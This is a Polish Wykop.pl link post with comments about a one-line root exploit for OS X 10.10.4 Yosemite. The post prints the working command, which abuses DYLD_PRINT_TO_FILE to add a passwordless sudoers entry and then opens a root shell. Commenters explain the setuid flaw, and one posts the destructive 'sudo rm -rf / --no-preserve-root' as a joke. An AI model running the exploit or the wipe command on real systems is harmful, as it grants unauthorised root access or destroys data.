Root na Maku w jednej linijce, OS X 10.10 Yosemite jest bezbronny
![Root na Maku w jednej linijce, OS X 10.10 Yosemite jest bezbronny](https://wykop.pl/cdn/c3397993/link_rxXPSJpByYIcwAxg4U5jfyCItnK4eNta,w300h194.jpg)
eśli chcecie uzyskać roota w najnowszej stabilnej wersji OS X 10.10.4 Yosemite, wystarczy uruchomić powłokę systemową i wpisać następującą komendę: echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
![garmet](https://wykop.pl/cdn/c3397992/garmet_vCytWN1arA,q52.jpg)
- #
- #
- #
- #
- #
- #
- 268
Komentarze (268)
najlepsze
@aksnet: jak dla kogo zaklecie, nie uzywam mak'a, w pracy siedze "przy windows" ale ta komenda to nic innego jak nadpisanie pliku okreslajacego kto i jak moze uzywac komendy sudo (wywolanie programu z poziomu root'a / administratora dla uzytkownikow widnows). Nowy plik zawiera prawa do wykonania wszystkich polecen bez hasla i nastepnei wywolanie konsoli dla root'a. Domyslam sie tylko celem potwierdzenia
@Djuna: problem polega na tym ze ten program do drukowania nie powinien miec ustawionego setuid i byc wlasnoscia root'a. setuid pozwala na szybkie obejscie wszystkich zabezpieczen i tylko wybrane, dobrze sprawdzone programy,. ktore swoja funkcjonalnoscia nie pozwalaja na modyfikcaje wrazliwych elementow systemu moga dostac setuid.
Twoj arch jest bezpieczyn
napisał dziennikarz www.dobreprogramy.pl
widać, "znak zachęty" zmienił się z '$' na '#', co oznacza uprawnienia roota; po drodze nie było promptu o hasło
Na nowym macu użytkownik fabrycznie nie może w ogóle korzystać z uprawnień roota czy może chodzi tutaj tylko o potencjalny wektor ataku a su/sudo działa jak bozia przykazała na niegrzebanym OSXie?
Nawet taki żart był, że po wyciągnięciu wtyczki z sieci maszyna linuxowa powinna zapytać o uprawnienia roota, a jeśli ich brak - kontynuować pracę.
@StayAlive: W Windowsie, począwszy od Visty istnieje podobny mechanizm - User Account Control. Jednak znaczna część użytkowników to wyłącza, bo ciągłe potwierdzanie wykonania procedury wymagającej wyższych uprawnień ich irytuje. A potem dziwota, że pecety z Windowsem są zawirusowane.
--no-preserve-root
.sudo rm -rf / --no-preserve-root
Głosuj sobie dalej na PO :/
Tak, bo jest prawdziwym Unixem - w przeciwieństwie do Linuxa ( ͡° ͜ʖ ͡°)
Tymczasem